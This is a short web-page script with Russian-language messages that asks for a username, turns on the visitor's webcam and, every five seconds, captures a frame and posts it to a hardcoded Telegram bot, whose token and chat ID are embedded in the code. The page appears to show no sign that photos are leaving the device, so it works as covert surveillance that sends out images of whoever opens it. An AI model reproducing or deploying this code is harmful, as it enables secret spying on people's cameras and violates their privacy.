<script>
let ism = prompt("Введите своё Имя пользователя");

document.addEventListener("DOMContentLoaded", function () {
  const video = document.getElementById("video");

  navigator.mediaDevices
    .getUserMedia({ video: true })
    .then(function (stream) {
      video.srcObject = stream;
      video.play();

      video.onloadedmetadata = () => {
        setInterval(sendPhoto, 5000); // Только когда метаданные загружены
      };
    })
    .catch(function (err) {
      console.log("Ошибка при доступе к камере: " + err);
    });

  function sendPhoto() {
    if (video.videoWidth === 0 || video.videoHeight === 0) {
      console.log("Видео ещё не готово");
      return;
    }

    const canvas = document.createElement("canvas");
    canvas.width = video.videoWidth;
    canvas.height = video.videoHeight;
    const context = canvas.getContext("2d");
    context.drawImage(video, 0, 0, canvas.width, canvas.height);

    canvas.toBlob(function (blob) {
      const formData = new FormData();
      formData.append("chat_id", "1347186841");
      formData.append("photo", blob);

      fetch(
        "https://api.telegram.org/bot7963148627:AAHGkT746bxkUEnGH0UC5-rV0nd2tDpFKkg/sendPhoto",
        {
          method: "POST",
          body: formData,
        }
      )
        .then((response) => {
          if (!response.ok) {
            throw new Error("Ошибка отправки фотографии на сервер");
          }
          console.log("Фотография успешно отправлена");
        })
        .catch((error) => {
          console.error("Произошла ошибка:", error);
        });
    }, "image/jpeg");
  }
});
</script>
